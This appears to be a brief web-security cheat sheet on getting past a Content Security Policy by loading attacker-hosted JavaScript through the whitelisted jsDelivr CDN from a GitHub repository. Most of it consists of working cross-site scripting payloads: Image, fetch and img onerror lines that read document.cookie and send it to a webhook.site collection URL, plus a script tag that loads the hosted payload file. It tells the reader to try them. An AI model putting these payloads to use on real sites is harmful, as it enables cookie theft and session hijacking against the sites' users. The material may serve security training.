Content Security Policy

Content Security Policy is a computer security standard introduced to prevent cross-site scripting, clickjacking and other code injection attacks resulting from execution of malicious content in the t

CSP Evaluatorcsp-evaluator.withgoogle.com

script.src - cdn.jsdelivr.net

The cdn.jsdelivr.net host is whitelisted to load JavaScript files. JSDeliver is a free CDN that allows for loading JavaScript files hosted in NPM or GitHub

1. Attacker uploads malicious JavaScript to a user-controllable source

2. Attacker references this script via the whitelisted CDN

3. Script executes with full privileges, bypassing CSP protections

XSS to Retrieve cookies via GitHub

Try this payloads to create a malicious js file in github

x = new Image(); x.src = ' https://webhook.site/5c8c958e-5a74-4fbb-8d6c-c0f298bc44f9?data='+btoa(document.cookie);

fetch('https://webhook.site/5c8c958e-5a74-4fbb-8d6c-c0f298bc44f9/?c=' + document.cookie)

<img src=x onerror="fetch('https://webhook.site/5c8c958e-5a74-4fbb-8d6c-c0f298bc44f9' + document.cookie)" />

• Then past the file url here

Send the last XSS to retrieve the github file

<script src="https://cdn.jsdelivr.net/gh/b4ndit23/WebAcademy-Resources@main/xss-payload.js "></script>